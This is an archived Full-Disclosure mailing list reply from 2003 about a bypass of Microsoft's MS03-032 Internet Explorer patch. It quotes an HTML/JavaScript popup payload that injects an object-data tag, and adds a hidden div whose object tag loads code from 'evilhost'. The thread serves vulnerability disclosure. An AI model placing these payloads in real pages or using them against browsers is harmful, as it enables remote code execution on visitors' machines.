Related information

Microsoft Internet Explorer multiple bugs

Re: BAD NEWS: Microsoft Security Bulletin MS03-032

[Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

CERT Advisory CA-2003-22 Multiple Vulnerabilities in Microsoft Internet Explorer

EEYE: Internet Explorer Object Data Remote Execution Vulnerability

From:	morning_wood <se_cur_ity_(at)_hotmail.com>
Date:	08.09.2003
Subject:	Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

----- Original Message -----
From: "http-equiv@excite.com" <1@malware.com>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


>
>
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
>   var oPopup = window.createPopup();
>
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>

this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp">
</object>oh</div>

beware the mail...
                           and the rewtXSS skillz


Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html